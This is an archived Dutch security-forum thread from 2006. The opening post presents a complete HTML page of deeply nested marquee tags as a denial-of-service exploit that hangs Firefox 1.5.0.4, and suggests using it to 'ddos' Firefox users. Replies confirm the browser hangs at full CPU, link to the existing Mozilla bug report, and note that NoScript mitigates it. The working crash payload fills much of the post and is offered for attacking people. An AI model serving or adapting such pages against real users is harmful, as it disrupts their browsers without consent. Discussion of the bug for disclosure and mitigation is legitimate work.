Archief - De topics van lang geleden

DOS Exploit in Firefox 1.5.0.4

04-06-2006, 00:27 door Anoniem, 9 reacties
Met deze code:

<html>
<head>
<title>Credit's go to n00b</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>
<marquee><marquee><marquee><marquee><marquee><marquee><ma
rquee><marquee><marquee><marquee><marquee><marquee><marque
e><marquee><marquee><marquee><marquee><marquee><marquee><
marquee><marquee><marquee><marquee><marquee><marquee><mar
quee><marquee><marquee><marquee><marquee><marquee><marque
e><marquee><marquee><marquee><marquee><marquee><marquee><
marquee><marquee><marquee><marquee><marquee><marquee><mar
quee><marquee><marquee><marquee><marquee><marquee><marque
e><marquee><marquee><marquee><marquee><marquee><marquee><
marquee><marquee><marquee><marquee><marquee><marquee><mar
quee><marquee><marquee><marquee><marquee></marquee></marque
e></marquee></marquee></marquee></marquee></marquee></marquee
></marquee></marquee></marquee></marquee></marquee></marquee>
</marquee></marquee></marquee></marquee></marquee></marquee><
/marquee></marquee></marquee></marquee></marquee></marquee></
marquee></marquee></marquee></marquee></marquee></marquee></
marquee></marquee></marquee></marquee></marquee></marquee></
marquee></marquee></marquee></marquee></marquee></marquee></
marquee></marquee></marquee></marquee></marquee></marquee></
marquee></marquee></marquee></marquee></marquee></marquee></
marquee></marquee></marquee></marquee></marquee></marquee></
marquee></marquee></marquee></marquee></marquee></marquee>
</body>
</html>

Is het mogelijk om Firefox 1.5.0.4 gebruikers te ddossen.

MVG

BSPBSP
Reacties (9)
04-06-2006, 10:04 door Anoniem
Ey yaa man bij mij flipt Firefox!
04-06-2006, 12:37 door G-Force
Even een vraag: heb je dit al gemeld aan de Mozilla foundation?
05-06-2006, 02:04 door Anoniem
bij mij doet dat scriptje nix terwijl ik zelf niet over een
anti spyware of virusscanner beschikt ;) . en ik heb zelfs
versie 1.5.0.4
serieus
05-06-2006, 02:07 door Anoniem
Ow lol nu doet ie het... ik had het scriptje niet goed
geplakt...

btw... er is nog geen update voor :) lol
05-06-2006, 09:08 door Anoniem
De code werkt niet in Firefox 1.5.0.4 met NoScript aan:
pagina blijft blanco maar FF reageert gewoon.

-JB
05-06-2006, 11:00 door Anoniem
is al een oude bekende bug in firefox, hou eens op de met de
bugtraq mailing list hier te copy pasten.

https://bugzilla.mozilla.org/show_bug.cgi?id=239840
05-06-2006, 13:29 door Anoniem
@Anoniem 05 juni 2006 11:00

Getest met FF 1.5.0.3 (!) en Fedora Core 5 (2.6.16-1.2122_FC5).
De attached testcase
(https://bugzilla.mozilla.org/attachment.cgi?id=148963)
werkt: Uh Oh... de processor schiet naar de 100%. Dit onder
linux. Met een KILL-signaal Firefox afsluiten en dan nog een
keer proberen met zonder Javascript (NoScript blokeert
mozilla.org): dan gebeurt er niets; je krijgt een mooie
zwarte bladzijde met "Done Hanging".
NoScript heerscht grote tijd! :)
05-06-2006, 14:26 door G-Force
Door Anoniem
Ow lol nu doet ie het... ik had het scriptje niet goed
geplakt...

btw... er is nog geen update voor :) lol


Dat klopt volgens het ISC (die ook de code ontvangen heeft).
De PoC blijkt ook daar inderdaad te werken. Ook daar is bevestigd dat de processor naar de 100% loopt.
06-06-2006, 00:01 door Lenin2
ddossen ? is dat mogelijk dan ? leer jij maar eerst wat het inhoud opzicht
is het een simpele HTML code zo kun je er wel honderden verzinnen op
een dag
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.